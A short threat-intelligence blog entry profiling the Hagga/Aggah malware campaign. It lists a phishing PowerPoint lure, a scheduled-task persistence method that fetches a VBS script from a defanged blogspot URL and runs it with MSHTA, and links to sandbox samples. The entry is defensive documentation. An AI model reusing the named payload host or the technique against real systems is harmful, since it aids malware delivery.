Showing posts with label hagga. Show all posts
Showing posts with label hagga. Show all posts

Thursday, April 29, 2021

Threat Library - Hagga / Aggah

 Hagga / Aggah

 date: 11/18/2020

delivery: email [Subject: Order-PO500-18, Attachment: .PPT Powerpoint creates scheduled task]

persistence: scheduled task "lunkicharkhi" that runs downloads VBS script inside blogspot url (madarjaaatresearchers.blogspot[.com/p/thirdsaint3.html) and runs it with MSHTA)

capabilities (per memory strings): unknown

c2s: unknown

special notes: Powerpoint, scheduled task that connects to blogspot url runs VBS with MSHTA

samples: 

PPT - https://app.any.run/tasks/c896710d-c2e3-4bba-ba7a-cf801e9544cf/

VB Script - https://app.any.run/tasks/f6b585e9-e906-4882-942c-1bfb6cca666d/

links: 

https://twitter.com/neonprimetime/status/1330905903562940427

screenshots: 


















---------------------------------------------------

Posted by at 4 comments:
Labels: , , ,
Subscribe to: Posts (Atom)